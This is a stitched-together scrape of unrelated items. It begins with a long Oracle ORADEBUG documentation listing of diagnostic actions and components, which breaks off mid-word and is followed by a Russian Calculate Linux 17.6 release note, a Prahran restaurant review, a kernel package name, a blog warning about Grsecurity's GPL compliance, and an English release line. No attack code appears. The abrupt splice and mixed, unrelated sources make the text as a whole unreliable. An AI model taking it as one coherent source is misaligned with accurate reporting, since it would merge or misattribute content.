dumpGeneralConfiguration
dumpADRLockTable
shortstack
- get short stack (up to 256 characters)
showoffsets controls display of code offsets
skipframes can be used to overcome 256 char limit
dbgvci_action_signal_crash

Actions in library RDBMS:
---------------------------
incident - Create an Incident
sqlmon_dump - SQL Monitor Dump SGA Action
varaddr - Return address of a fixed PGA/SGA/UGA variable
username - Return user log-in name
sqlid - Return current SQL Id in character format
flashfreeze
oradebug - debug process using ORADEBUG
debugger - debug process using System Debugger
debug
- alias for 'debugger' - debug process using System Debugger
crash - crash process
kill_instance - killing RDBMS instance
controlc_signal - received 1013 signal
eventdump - list events that are set in the group
kdlut_bucketdump_action
kzxt_dump_action
dumpKernelDiagState
HMCHECK (async)
DATA_BLOCK_INTEGRITY_CHECK (async)
CF_BLOCK_INTEGRITY_CHECK (async)
DB_STRUCTURE_INTEGRITY_CHECK (async)
REDO_INTEGRITY_CHECK (async)
TRANSACTION_INTEGRITY_CHECK (async)
SQL_TESTCASE_REC (async)
SQL_TESTCASE_REC_DATA (async)
ORA_12751_DUMP
sqladv_dump_dumpctx
ORA_4030_DUMP
- dump summary of PGA memory usage, largest allocations
ORA_4036_DUMP - dump summary of PGA memory usage
HNGDET_MEM_USAGE_DUMP_NOARGS - dump hang detection memory usage
kcfis_action - kcfis actions
exadata_dump_modvers - Exadata dump module versions
QUERY_BLOCK_DUMP - Debug action for dumping a qbcdef tree
dumpADVMState - Dump contents of ADVM state
dumpASMState - Dump contents of ASM state
ASM_CHECK_DG (async) - Run check diskgroup
ASM_DUMP_KSTSS - Dump KST Trace and System State
ASM_MOUNT_FAIL_CHECK (async)
ASM_DGFDM_CHECK_NO_DG_NAME (async)
ASM_SYNC_IO_FAIL_CHECK (async)
ASM_DG_FORCE_DISMOUNT_CHECK (async)
ASM_ALLOC_FAIL_CHECK (async)
ASM_ADD_DISK_CHECK (async)
ASM_FILE_BUSY_CHECK (async)
ASM_TOOMANYOFF_FAIL_CHECK (async)
ASM_INSUFFICIENT_DISKS_CHECK (async)
ASM_INSUFFICIENT_MEM_CHECK (async)
KJZN_ASYNC_SYSTEM_STATE (async)
KSI_GET_TRACE - Get lmd0 traces for ksi issues
TRACE_BUFFER_ON - Allocate trace output buffer for ksdwrf()
TRACE_BUFFER_OFF
- Flush and deallocate trace output buffer for ksdwrf()
LATCHES - Dump Latches
XS_SESSION_STATE - Dump XS session state
PROCESSSTATE - Dump process state
SYSTEMSTATE - Dump system state
INSTANTIATIONSTATE - Dump instantiation state
CONTEXTAREA - Dump cursor context area
HEAPDUMP
- Dump memory heap (1-PGA, 2-SGA, 4-UGA, +1024-Content)
POKE_LENGTH - Set length before poking value
POKE_VALUE - Poke a value into memory
POKE_VALUE0 - Poke 0 value into memory
GLOBAL_AREA
- Dump fixed global area(s) (1=PGA/2=SGA/3=UGA, add +8 for pointer content)
REALFREEDUMP - Dump PGA real free memory allocator state
FLUSH_JAVA_POOL - Flush Java pool
PGA_DETAIL_GET
- Ask process to publish PGA detail info (level is pid)
PGA_DETAIL_DUMP
- Dump PGA detail information for process (level is pid)
PGA_DETAIL_CANCEL - Free PGA detail request (level is pid)
PGA_SUMMARY - Summary of PGA memory usage, largest allocations
MODIFIED_PARAMETERS - Dump parameters modifed by session (level unused)
ERRORSTACK
- Dump state (ksedmp). Use INCIDENT action to create incident
CALLSTACK - Dump call stack (level > 1 to dump args)
RECORD_CALLSTACK
- Record or dump call stack, level = #frames (level += 1000000 go to trc)
BG_MESSAGES - Dump routine for background messages
ENQUEUES
- Dump enqueues (level >=2 adds resources, >= 3 adds locks)
KSTDUMPCURPROC
- Dump current process trace buffer (1 for all events)
KSTDUMPALLPROCS
- Dump all processes trace buffers (1 for all events)
KSTDUMPALLPROCS_CLUSTER
- Dump all processes (cluster wide) trace buffers (1 for all events)
KSKDUMPTRACE - Dumping KSK KST tracing (no level)
DBSCHEDULER - Dump ressource manager state
LDAP_USER_DUMP - Dump LDAP user mode
LDAP_KERNEL_DUMP - Dump LDAP kernel mode
DUMP_ALL_OBJSTATS - Dump database objects statistics
DUMPGLOBALDATA - Rolling migration DUMP GLOBAL DATA
HANGANALYZE - Hang analyze
HANGANALYZE_PROC - Hang analyze current process
HANGANALYZE_GLOBAL - Hang analyze system
HNGDET_MEM_USAGE_DUMP - dump hang detection memory usage
GES_STATE - Dump DML state
RACDUMP - Dump RAC state
OCR - OCR client side tracing
CSS - CSS client side tracing
CRS - CRS client side tracing
SYSTEMSTATE_GLOBAL - Perform cluster wide system state dump (via DIAG)
DUMP_ALL_COMP_GRANULE_ADDRS
- MMAN dump all granule addresses of all components (no level)
DUMP_ALL_COMP_GRANULES
- MMAN dump all granules of all components (1 for partial list)
DUMP_ALL_REQS
- MMAN dump all pending memory requests to alert log
DUMP_TRANSFER_OPS - MMAN dump transfer and resize operations history
DUMP_ADV_SNAPSHOTS
- MMAN dump all snapshots of advisories (level unused)
CONTROLF - DuMP control file info
FLUSH_CACHE
- Flush buffer cache without shuting down the instance
SET_AFN - Set afn # for buffer flush (level = afn# )
SET_ISTEMPFILE
- Set istempfile for buffer flush (level = istempfile )
FLUSH_BUFFER - Reuse block range without flushing entire cache
BUFFERS - Dump all buffers in the buffer cache at level l
SET_TSN_P1
- Set tablespace # for buffer dump (level = ts# + 1)
BUFFER
- Dump all buffers for full relative dba <level> at lvl 10
BC_SANITY_CHECK
- Run buffer cache sanity check (level = 0xFF for full)
SET_NBLOCKS - Set number of blocks for range reuse checks
CHECK_ROREUSE_SANITY - Check range/object reuse sanity (level = ts#)
DUMP_PINNED_BUFFER_HISTORY
- kcb Dump pinned buffers history (level = # buffers)
REDOLOGS - Dump all online logs according to the level
LOGHIST
- Dump the log history (1: dump earliest/latest entries, >1: dump most recent 2**level entries)
REDOHDR - Dump redo log headers
LOCKS - Dump every lock element to the trace file
GC_ELEMENTS - Dump every lock element to the trace file
FILE_HDRS - Dump database file headers
FBINC
- Dump flashback logs of the current incarnation and all its ancestors.
FBHDR - Dump all the flashback logfile headers
FLASHBACK_GEN - Dump flashback generation state
KTPR_DEBUG
- Parallel txn recovery (1: cleanup check, 2: dump ptr reco ctx, 3: dump recent smon runs)
DUMP_TEMP - Dump temp space management state (no level)
DROP_SEGMENTS - Drop unused temporary segments
TREEDUMP
- Dump an index tree rooted at dba BLOCKDBA (<level>)
KDLIDMP - Dump 11glob inodes states (level = what to dump)
ROW_CACHE - Dump all cache objects
LIBRARY_CACHE
- Dump the library cache (level > 65535 => level = obj @)
CURSORDUMP - Dump session cursors
CURSOR_STATS - Dump all statistics information for cursors
SHARED_SERVER_STATE - Dump shared server state
LISTENER_REGISTRATION - Dump listener registration state
JAVAINFO - Dump Oracle Java VM
KXFPCLEARSTATS - Clear all Parallel Query messaging statistics
KXFPDUMPTRACE - Dump Parallel Query in-memory traces
KXFXSLAVESTATE - Dump PX slave state (1: uga; 2: current cursor state; 3: all cursors)
KXFXCURSORSTATE - Dump PX slave cursor state
WORKAREATAB_DUMP - Dump SQL Memory Manager workarea table
OBJECT_CACHE - Dump the object cache
SAVEPOINTS - Dump savepoints
RULESETDUMP - Dump rule set
FAILOVER - Set condition failover immediate
OLAP_DUMP - Dump OLAP state
AWR_FLUSH_TABLE_ON - Enable flush of table id <level> (ids in X$KEWRTB)
AWR_FLUSH_TABLE_OFF
- Disable flush of table id <level> (ids in X$KEWRTB)
ASHDUMP - Dump ASH data (level = # of minutes)
ASHDUMPSECONDS - Dump ASH data (level = # of seconds)
HM_FW_TRACE - DIAG health monitor set tracing level
IR_FW_TRACE - DIAG intelligent repair set/clear trace
GWM_TRACE - Global Services Management set/clear trace
GWM_TEST - Global Services Management set/clear GDS test
GLOBAL_BUFFER_DUMP - Request global buffer dump (level 1 = TRUE)
DEAD_CLEANUP_STATE - Dump dead processes and killed sessions
IMDB_PINNED_BUFFER_HISTORY
- Dump IMDB pinned buffer history (level = (dump_level << 16 | num_buffers))
HEAPDUMP_ADDR - Heap dump by address routine (level > 1 dump content)
POKE_ADDRESS - Poke specified address (level = value)
CURSORTRACE - Trace cursor by hash value (hash value is address)
RULESETDUMP_ADDR - Dump rule set by address
kewmdump - Dump Metrics Metadata and Memory
con_id - Return Container Id as UB8
DBGT_SPLIT_CSTSTRING
DUMP_SWAP - dump system memory and swap information
ALERT_SWAP - issue alert message about system swap percentage
DUMP_PATCH - dump patch information
dumpBucketsRdbms

Actions in library GENERIC:
---------------------------
xdb_dump_buckets
dumpKGERing - Dump contents of KGE ring buffer
dumpKGEState - Dump KGE state information for debugging

Actions in library CLIENT:
---------------------------
kpuActionDefault - dump OCI data
kpuActionSignalCrash
- crash and produce a core dump (if supported and possible)
kpudpaActionDpapi - DataPump dump action


SQL> spool off
ORADEBUG DOC EVENT ACTION <action_name>
You can get more details about some actions by running the doc command for the library.action:

SQL> ORADEBUG DOC EVENT ACTION RDBMS.query_block_dump

ORADEBUG DOC COMPONENT


SQL> ORADEBUG DOC COMPONENT


Components in library DIAG:
--------------------------
diag_uts Unified Tracing Service (dbgt, dbga)
uts_vw UTS viewer toolkit (dbgtp, dbgtn)
diag_adr Automatic Diagnostic Repository (dbgr)
ams_comp ADR Meta-data Repository (dbgrm)
ame_comp ADR Export/Import Services (dbgre)
ami_comp ADR Incident Meta-data Services (dbgri)
diag_ads Diagnostic Directory and File Services (dbgrf, sdbgrf, sdbgrfu, sdbgrfb)
diag_hm Diagnostic Health Monitor ((null))
diag_ips Diagnostic Incident Packaging System ((null))
diag_dde Diagnostic Data Extractor (dbge)
diag_fmwk Diagnostic Framework (dbgc)
diag_ilcts Diagnostic Inter-Library Compile-time Service (dbgf)
diag_attr Diagnostic Attributes Management ((null))
diag_comp Diagnostic Components Management ((null))
diag_testp Diagnostic component test parent (dbgt)
diag_testc1 Diagnostic component test child 1 ((null))
diag_testc2 Diagnostic component test child 2 ((null))
KGSD Kernel Generic Service Debugging (kgsd)
diag_events Diagnostic Events (dbgd)
diag_adl Diagnostic ARB Alert Log (dbgrl, dbgrlr)
diag_vwk Diagnostic viewer toolkit (dbgv)
diag_vwk_parser Diagnostic viewer parser (dbgvp, dbgvl)
diag_vwk_uts Diagnostic viewer for UTS traces and files (dbgvf)
diag_vwk_ams Diagnostic viewer for AMS metadata (dbgvm)
diag_vwk_ci Diagnostic viewer for command line (dbgvci)
kghsc KGHSC Compact Stream (kghsc)
dbgxtk DBGXTK xml toolkit (dbgxtk)

Components in library RDBMS:
--------------------------
SQL_Compiler SQL Compiler ((null))
SQL_Parser SQL Parser (qcs)
SQL_Semantic SQL Semantic Analysis (kkm)
SQL_Optimizer SQL Optimizer ((null))
SQL_Transform SQL Transformation (kkq, vop, nso)
SQL_MVRW SQL Materialized View Rewrite ((null))
SQL_VMerge SQL View Merging (kkqvm)
SQL_Virtual SQL Virtual Column (qksvc, kkfi)
SQL_APA SQL Access Path Analysis (apa)
SQL_Costing SQL Cost-based Analysis (kko, kke)
SQL_Parallel_Optimization SQL Parallel Optimization (kkopq)
SQL_Plan_Management SQL Plan Managment (kkopm)
SQL_Plan_Directive SQL Plan Directive (qosd)
SQL_Code_Generator SQL Code Generator (qka, qkn, qke, kkfd, qkx)
SQL_Parallel_Compilation SQL Parallel Compilation (kkfd)
SQL_Expression_Analysis SQL Expression Analysis (qke)
MPGE MPGE (qksctx)
ADS ADS (kkoads)
SQL_Execution SQL Execution (qer, qes, kx, qee)
Parallel_Execution Parallel Execution (qerpx, qertq, kxfr, kxfx, kxfq, kxfp)
PX_Messaging Parallel Execution Messaging (kxfp)
PX_Group Parallel Execution Slave Group (kxfp)
PX_Affinity Parallel Affinity (ksxa)
PX_Buffer Parallel Execution Buffers (kxfpb)
PX_Granule Parallel Execution Granules (kxfr)
PX_Control Parallel Execution Control (kxfx)
PX_Table_Queue Parallel Execution Table Queues (kxfq)
PX_Scheduler Parallel Execution Scheduler (qerpx)
PX_Queuing Parallel Execution Queuing (kxfxq)
PX_Blackbox Parallel Execution Blackbox (kxf)
PX_PTL Parallel Execution PTL (kxft)
PX_Expr_Eval Parallel Execution Expression Evaluation ((null))
PX_Selector Parallel Execution PX Selector (qerpsel)
PX_Overhead Parallel Execution Overhead (qerpx, kxfr, kxfx, kxfp)
Bloom_Filter Bloom Filter (qerbl, qesbl)
Vector_Processing Vector Processing ((null))
Vector_Translate Vector Translate (qkaxl, qerxl, qesxl, qesxlp, qerrc)
Vector_Aggregate Vector Aggregate (qergv, qesgv)
Vector_PX Vector PX (qesxlp, qerxl)
Time_Limit Query Execution Time Limit (opiexe, qerst)
PGA_Manage PGA Memory Management ((null))
PGA_Compile PGA Memory Compilation ((null))
PGA_IMM PGA Memory Instance Manage ((null))
PGA_CMM PGA Memory Cursor Manage ((null))
PGA_ADV PGA Memory Advisor ((null))
rdbms_dde RDBMS Diagnostic Data Extractor (dbke)
VOS VOS (ks)
hang_analysis Hang Analysis (ksdhng)
background_proc Background Processes (ksb, ksbt)
system_param System Parameters (ksp, kspt)
ksu Kernel Service User (ksu)
ksutac KSU Timeout Actions ((null))
ksv_trace Kernel Services Slave Management (ksv)
file File I/O (ksfd, ksfdaf)
sql_mon SQL Monitor (keswx)
sql_mon_deamon SQL Monitor Deamon ((null))
sql_mon_query SQL Monitor Query ((null))
CACHE_RCV Cache Recovery (kcv, kct, kcra, kcrp, kcb)
DLF Delayed Log Force ((null))
DIRPATH_LOAD Direct Path Load (kl, kdbl, kpodp)
DIRPATH_LOAD_BIS Direct Path Kpodpbis Routine (kpodp)
RAC Real Application Clusters ((null))
GES Global Enqueue Service ((null))
KSI Kernel Service Instance locking (ksi)
RAC_ENQ Enqueue Operations ((null))
DD GES Deadlock Detection ((null))
RAC_BCAST Enqueue Broadcast Operations ((null))
RAC_FRZ DLM-Client Freeze/Unfreeze (kjfz)
KJOE DLM Omni Enqueue service (kjoe)
GCS Global Cache Service (kjb)
GCS_BSCN Broadcast SCN (kjb, kcrfw)
GCS_READMOSTLY GCS Read-mostly (kjb)
GCS_READER_BYPASS GCS Reader Bypass (kjb)
GCS_DELTAPUSH GCS Delta Push (kjb)
GSIPC Global Enqueue/Cache Service IPC ((null))
RAC_RCFG Reconfiguration ((null))
RAC_DRM Dynamic Remastering ((null))
RAC_MRDOM Multiple Recovery Domains ((null))
CGS Cluster Group Services (kjxg)
CGSIMR Instance Membership Recovery (kjxgr)
RAC_WLM Work Load Management (wlm)
RAC_MLMDS RAC Multiple LMS (kjm)
RAC_KA Kernel Accelerator (kjk)
RAC_LT RAC Latch Usage ((null))
db_trace RDBMS server only tracing ((null))
kst server trace layer tracing (kst)
ddedmp RDBMS Diagnostic Data Extractor Dumper (dbked)
cursor Shared Cursor (kxs, kks)
Bind_Capture Bind Capture Tracing ((null))
KSM Kernel Service Memory (ksm)
KSE Kernel Service Error Manager (kse)
explain SQL Explain Plan (xpl)
rdbms_event RDBMS Events (dbkd)
LOB_INODE Lob Inode (kdli)
rdbms_adr RDBMS ADR (dbkr)
ASM Automatic Storage Management (kf)
KFK KFK (kfk)
KFKIO KFK IO (kfkio)
KFKSB KFK subs (kfksubs)
KFN ASM Networking subsystem (kfn)
KFNU ASM Umbillicus (kfnm, kfns, kfnb)
KFNS ASM Server networking (kfns)
KFNC ASM Client networking (kfnc)
KFNOR KFN orion (kfnor)
KFIS ASM Intelligent Storage interfaces (kfis)
KFM ASM Node Monitor Interface Implementation (kfm)
KFMD ASM Node Monitor Layer for Diskgroup Registration (kfmd)
KFMS ASM Node Monitor Layers Support Function Interface (kfms)
KFFB ASM Metadata Block (kffb)
KFFD ASM Metadata Directory (kffd)
KFZ ASM Zecurity subsystem (kfz)
KFC ASM Cache (kfc)
KFR ASM Recovery (kfr)
KFE ASM attributes (kfe)
KFDP ASM PST (kfdp)
KFG ASM diskgroups (kfg)
KFDS ASM staleness registry and resync (kfds)
KFIA ASM Remote (kfia)
KFIAS ASM IOServer (kfias)
KFIAC ASM IOServer client (kfiac)
KFFSCRUB ASM Scrubbing (kffscrub)
KFIO ASM translation I/O layer (kfio)
KFIOER ASM translation I/O layer (kfioer)
KFV ASM Volume subsystem (kfv)
KFVSU ASM Volume Umbillicus (kfvsu)
KFVSD ASM Volume Background (kfvsd)
KFDX ASM Exadata interface (kfdx)
KFZP ASM Password File Layer (kfzp)
KFA ASM Alias Operations (kfa)
KFF KFF (kff)
KFD ASM Disk (kfd)
KFDVA ASM Virtual ATB (kfdva)
KFTHA ASM Transparent High Availability (kftha)
DML DML Drivers (ins, del, upd)
Health_Monitor Health Monitor ((null))
DRA Data Repair Advisor ((null))
DIRACC Direct access to fixed tables (kqfd)
PART Partitioning (kkpo, qespc, qesma, kkpa, qergi)
PART_IntPart Interval Partitioning ((null))
PART_Dictionary Partitioning Dictionary (kkpod)
LOB_KDLW Lob kdlw (kdlw)
LOB_KDLX Lob xfm (kdlx)
LOB_KDLXDUP Lob dedup (kdlxdup)
LOB_KDLRCI Lob rci (kdlrci)
LOB_KDLA SecureFile Archive (kdla)
SQL_Manage SQL Manageability (kes)
SQL_Manage_Infra Other SQL Manageability Infrastructure (kesai, kesqs, kesatm, kesutl, kessi, keswat, keswts, keswsq)
SQL_Tune SQL Tuning Advisor (kest)
SQL_Tune_Auto SQL Tuning Advisor (auto-tune) (kestsa)
Auto_Tune_Opt Auto Tuning Optimizer (kkoat)
SQL_Tune_Index SQL Tuning Advisor (index-tune) (kestsi)
SQL_Tune_Plan SQL Tuning Advisor (plan node analysis) (kestsp)
SQL_Tune_Px SQL Tuning Advisor (parallel execution) (kestsa)
SQL_Tune_Fr SQL Tuning Advisor (fix regression) (kestsa)
SQL_Test_Exec SQL Test-Execute Service (kestse)
SQL_Perf SQL Performance Analyzer (kesp, keswpi)
SQL_Repair SQL Repair Advisor (kesds)
SQL_trace_parser SQL trace parser (kesstp)
SQL_Analyze SQL Analyze (qksan)
SQL_DS SQL Dynamic Sampling Services (qksds)
SQL_DDL SQL DDL (atb, ctc, dtb)
RAT_WCR Real Application Test: Workload Capture and Replay (kec)
Spatial Spatial (md)
Spatial_IND Spatial Indexing (mdr)
Spatial_GR Spatial GeoRaster (mdgr)
Text Text (dr)
rdbms_gc RDBMS Diagnostic Generic Configuration (dbkgc)
XS XS Fusion Security (kzx)
XSSESSION XS Session (kzxs)
XSPRINCIPAL XS Principal (kzxu)
XSSECCLASS XS Security Class (kzxc, kzxsp)
XSXDS XS Data Security (kzxd)
XSVPD XS VPD ((null))
XSXDB_DEFAULT XS XDB ((null))
XS_MIDTIER XS Midtier (kpuzxs)
XSNSTEMPLATE XS Namespace template (kzxnt)
XSACL XS ACL (kzxa)
XSADM XS Administrative operation (kzxm, kzxi)
AQ Streams Advanced Queuing (kwq, kkcn, kpon, kpoaq, kpce, kpcm, kpun, kpuaq, kws)
AQ_DEQ Streams Advanced Queuing Dequeue (kwqid, kwqdl)
AQ_BACK Streams Advanced Queueing Background (kwsbg, kwsbsm)
AQ_TM Streams Advanced Queuing Time Manager (kwqit, kwqmn)
AQ_CP Streams Advanced Queuing Cross Process (kwscp, kwsipc)
AQ_LB Streams Advanced Queuing Load Balancer (kwslb, kwslbbg)
AQ_NTFN Streams Advanced Queuing Notification (kpond, kkcne)
AQ_NTFNP12C Streams Advanced Queuing pre-12c Notification (kwqic)
AQ_TMSQ Streams Advanced Queuing Time Manager for Sharded Queue (kwsbtm, kwsbjc, kwsbit)
AQ_MC Streams Advanced Queuing Message Cache (kwsmc, kwssh, kwsmb, kwsmsg, kwssb, kwschnk, kwscb, kwsdqwm, kwssbsh)
AQ_PT Streams Advanced Queuing Partitioning (kwspt)
AQ_SUB Streams Advanced Queuing Subscription (kwssi, kwssa, kwsnsm, kwsnsme)
KSFM Kernel Service File Mapping (ksfm)
KXD Exadata specific Kernel modules (kxd)
KXDAM Exadata Disk Auto Manage (kxdam)
KCFIS Exadata Predicate Push (kcfis)
NSMTIO Trace Non Smart I/O (nsmtio)
KXDBIO Exadata Block level Intelligent Operations (kxdbio)
KXDRS Exadata Resilvering Layer (kxdrs)
KXDOFL Exadata Offload (kxdofl)
KXDMISC Exadata Misc (kxdmisc)
KXDCM Exadata Metrics Fixed Table Callbacks (kxdcm)
KXDBC Exadata Backup Compression for Backup Appliance (kxdbc)
DV Database Vault (kzv)
ASO Advanced Security Option ((null))
RADM Real-time Application-controlled Data Masking (kzradm)
SVRMAN Server Manageability (ke)
AWR Automatic Workload Repository (kew)
ASH Active Session History (kewa)
METRICS AWR metrics (kewm)
REPOSITORY AWR Repository (kewr)
FLUSH AWR Snapshot Flush (kewrf)
PURGE AWR Snapshot Purge (kewrps)
AWRUTL AWR Utilities (kewu)
AUTOTASK Automated Maintenance Tasks (ket)
MMON MMON/MMNL Infrastructure (keb)
SVRALRT Server Generated Alert Infrastructure (kel)
OLS Oracle Label Security (zll)
AUDITNG Database Audit Next Generation (aud, kza, kzft, aus, aop, ttp)
Configuration ANG Configuration (aud, kza, kzft, aus, aop, ttp)
QueueWrite ANG Queue Write (aud, kza, kzft, aus, aop, ttp)
FileWrite ANG File Write (aud, kza, kzft, aus, aop, ttp)
RecordCompose ANG Record Compose (aud, kza, kzft, aus, aop, ttp)
DBConsolidation ANG Database Consolidation (aud, kza, kzft, aus, aop, ttp)
SYS_Auditing ANG SYS Auditing (aud, kza, kzft, aus, aop, ttp)
KJCI KJCI Cross Instance Call (kjci)
KJZ KJZ - DIAG (kjz)
KJZC KJZC - DIAG Communication Layer (kjzc)
KJZD KJZD - DIAG Main Layer (kjzd)
KJZF KJZF - DIAG Flow Control Layer (kjzf)
KJZG KJZG - DIAG Group Services Layer (kjzg)
KJZH KJZH - DIAG API Layer (kjzh)
KJZM KJZM - DIAG Membership Layer (kjzm)
SEC Security (kz)
CBAC Code-Based Access Control (kzc)
dbop DBOP monitoring (keomn)
dbop_gen DBOP generic service (keomg)
dbop_deamon DBOP monitoring Deamon (keomg)
dbop_comp DBOP composite type (keomm)
em_express EM Express (kex)
orarep orarep (ker)
Data Data Layer (kd, ka)
KDS Kernel Data Scan (kds)
KDSRID Fetch By Rowid (kdsgrp, kdsgnp)
KDSFTS Full Table Scan (kdsttgr, kdstgr)
KDSCLU Cluster Table Scan (kdsics, kdscgr)
KDI Index Layer (kdi)
KDIZOLTP OLTP HIGH Index (kdizoltp)
KDXOKCMP Auto Prefix Compressed Index (kdxokcmp)
KDIL Index Load (kdil)
RAT Real Application Testing (kec)
RAT_MASK Real Application Testing: Masking (kesm, kecprm)
BA Backup Appliance (kbrs)
KBC BA Containers (kbc)
connection_broker Connection Broker (kmp)
KRA Kernel Recovery Area Function (kra)
KRA_SQL KRA SQL Tracing ((null))
KRB Kernel Backup Restore (krb)
KRB_THREAD KRBBPC Thread Switches ((null))
KRB_IO KRB I/O ((null))
KRB_INCR KRB Incremental Restore ((null))
KRB_PERF KRB Performance Tracing ((null))
KRB_BPOUTPUT Detailed Backup Piece Output ((null))
KRB_BPVAL Detailed Block List During Restore Validate ((null))
KRB_FLWRES Details on Restore Flow ((null))
KRB_FLWCPY Details on krbydd Flow ((null))
KRB_FLWBCK Details on Backup Flow ((null))
KRB_FLWUSAGE RMAN Feature Usage ((null))
KRB_OPTIM Unused Space Compression ((nu
          Вышел Calculate Linux 17.6   

Мы рады представить вашему вниманию новый релиз Calculate Linux 17.6, выпущенный в честь 10-летия проекта!

В новой версии появилась поддержка установки системы в контейнере LXC/LXD, добавлена поддержка создания своих тем оформления, повышена стабильность бинарных пакетов за счёт включения автомагических зависимостей, улучшена безопасность путём добавления пароля на изменение параметров загрузки ядра загрузчика, а так же предоставления отдельных прав пользователям на обновление системы.

Доступны для загрузки следующие редакции дистрибутива: Calculate Linux Desktop с рабочим столом KDE (CLD), Cinnamon (CLDC), Mate (CLDM) и Xfce (CLDX), Calculate Linux Scratch (CLS), Calculate Directory Server (CDS), Calculate Scratch Server (CSS), Timeless и Calculate Linux Container (CLC).

Основные изменения

Установка системы

  • Calculate включает новый дистрибутив Calculate Linux Container для установки в системе виртуализации LXC/LXD.
  • Используемый по умолчанию пароль гостевого пользователя более не переносится в устанавливаемую систему, вместо этого пользователю предлагается явно его указать.
  • Добавлена настройка прав доступа в Calculate Console, можно выбрать доступ только к обновлению системы.
  • Добавлена поддержка установки пароля на изменение параметров загрузки ядра.
  • Добавлена группа sudo для получения прав суперпользователя через одноимённую утилиту.
  • При установке с Live образа по умолчанию используется авторазметка.
  • Отключено создание bios_boot раздела при авторазметке для UEFI.
  • Удалено переписывание загрузочной записи UEFI если параметры не изменились.
  • Из дистрибутивов исключены зависимости необходимые только для сборки пакетов.

Обновление системы

  • Количество бинарных пакетов в репозитории увеличено до 9546 шт.
  • Добавлено кэширование индекса бинарных пакетов, который теперь обновляется вместе с портежами.
  • Поддерживается работа со сжатым индексным файлом, размер которого не превышает 1 Мб.
  • Отключён вызов исправления системных настроек если не обновлялись репозитории.

Сборка системы

  • Добавлена поддержка сборки системы для установки в системе виртуализации LXC/LXD.
  • Добавлена поддержка поиска автоматических зависимостей.
  • Добавлена пересборка пакетов с выявленными неописанными зависимостями (автомагическими).
  • Добавлен сет @autodeps содержащий пропущенные зависимости.
  • Отключена опция --with-bdeps для включения зависимостей необходимых только для сборки пакета.
  • Добавлен параметр --clean-bdeps для удаления из собираемой системы пакетов, необходимых только для сборки.
  • Отключено предварительное вычисление списка пакетов для обновления.

Внешний вид

  • Добавлена поддержка изменения оформления системы, настроек профиля при помощи конфигурационного файла /etc/calculate/ini.env.
  • Добавлена утилита cl-setup-themes для перенастройки тем.
  • Добавлено фоновое изображение в терминале.

Прочее

  • Восстановлена команда смены пароля пользователя домена cl-passwd.
  • Исправлена ошибка при загрузке системы с intel видеодрайвером.
  • Исправлена установка PXE.
  • Исправлено определение типа NVMe диска.
  • Отключён системный PROXY при получении файлов сервера обновлений.
  • Исправлена проблема ввода на болгарском и казахском языках.
  • Исправлен вход доменного пользователя в систему с шифрованным профилем.
  • Отключена настройка сетевых интерфейсов используемых для сетевого моста.
  • Добавлена начальная поддержка эстонского языка в утилитах Calculate.

Состав пакетов

  • CLD (KDE desktop):
    • KDE Frameworks 5.35, KDE Plasma 5.9.5, KDE Applications 17.04.2, LibreOffice 5.2.7.2, Firefox 54.0
    • i686 - 1.8 G, x86_64 - 2.0 G
  • CLDC (Cinnamon desktop):
    • Cinnamon 3.4, LibreOffice 5.2.7.2, Firefox 54.0, Evolution 3.22.6, Gimp 2.8.22, Rhythmbox 3.4.1
    • i686 - 1.6 G, x86_64 - 1.8 G
  • CLDM (MATE desktop):
    • MATE 1.18, LibreOffice 5.2.7.2, Firefox 54.0, Claws Mail 3.15.0, Gimp 2.8.22, Clementine 1.3.1
    • i686 - 1.7 G, x86_64 - 1.8 G
  • CLDX (Xfce desktop):
    • Xfce 4.12, LibreOffice 5.2.7.2, Firefox 54.0, Claws Mail 3.15.0, Gimp 2.8.22, Clementine 1.3.1
    • i686 - 1.5 G, x86_64 - 1.7 G
  • CDS (Directory Server):
    • OpenLDAP 2.4.44, Samba 4.5.10, Postfix 3.1.6, ProFTPD 1.3.5e, Bind 9.11.0_p5
    • i686 - 682 M, x86_64 - 722 M
  • CLS (Linux Scratch):
    • Xorg-server 1.19.3, Kernel 4.9.34
    • i686 - 748 M, x86_64 - 872 M
  • CSS (Scratch Server):
    • Kernel 4.9.34, Calculate Utilities 3.5.5.6
    • i686 - 464 M, x86_64 - 504 M
  • Timeless (New server):
    • OpenLDAP 2.4.44, Calculate Utilities 3.5.5.6
    • i686 - 489 M, x86_64 - 529 M

Обновление

Для обновления выполните cl-update, либо загрузите новый образ в директорию /var/calculate/linux и выполните cl-install.

 , , , ,


          Food Adventures: Mr Miyagi    
99 Chapel Street, Prahran
(03) 95295999

Mr. Miyagi on Urbanspoon

I love the vibe of this place. It's lively but not too noisy. The menu has a great variety, the service is attentive and the food tastes just as good as it looks. I never realised that this gem on Chapel Street was so close to home but often we take for granted what's right in our back yard, don't we?

The restaurant runs walk-in style however they do take early bookings from 5:30-6:30pm for groups 1-5, and groups of 6 or more can book into an early or late sitting.


Nori Taco - grilled salmon belly, vinegar rice, spicy nappa cabbage, Japanese mayo, chilli oil ($12) #datthumb


Tonkatsu Pork - crumbed pork goodness, chardonnay pickled pear, celeriac and apple salad ($10)


Battered Corn - tempura sweet corn kernels, freshly popped corn, corn salt and corn mayo ($15/3pc)


Scallop Pancakes - Hokkaido scallops, vegetable & smoked bacon pancake, shaved bonito flakes ($18/3pc)

Salmon Tartare - avocado, shallot, radish, cucumber, yuzu yoghurt pearl, nori potato crisps ($18) - excuse the terrible photo... I think I was too excited to dig into the first dish of the night! This was hands down my favourite dish.

Green Tea Soba Noodle Salad with konbu infused salmon ($23) 



Hello Kitty Sours - lychee, citrus & egg white ($16)



          kernel-4.11.8-1-x86_64   
kernel-4.11.8-1-x86_64
          Warning: Grsecurity: Potential contributory infringement risk for customers   

It’s my strong opinion that your company should avoid the Grsecurity product sold at grsecurity.net because it presents a contributory infringement risk.

Grsecurity is a patch for the Linux kernel which, it is claimed, improves its security. It is a derivative work of the Linux kernel which touches the kernel internals in many different places. It is inseparable from Linux and can not work without it. it would fail a fair-use test (obviously, ask offline if you don’t understand). Because of its strongly derivative nature of the kernel, it must be under the GPL version 2 license, or a license compatible with the GPL and with terms no more restrictive than the GPL. Earlier versions were distributed under GPL version 2.

Currently, Grsecurity is a commercial product and is distributed only to paying customers. My understanding from several reliable sources is that customers are verbally or otherwise warned that if they redistribute the Grsecurity patch, as would be their right under the GPL, that they will be assessed a penalty: they will no longer be allowed to be customers, and will not be granted access to any further versions of Grsecurity. GPL version 2 section 6 explicitly prohibits the addition of terms such as this redistribution prohibition.

Read more


          Calculate Linux 17.6 released   

We are happy to announce the release of Calculate Linux 17.6, marking the 10th anniversary of the project.

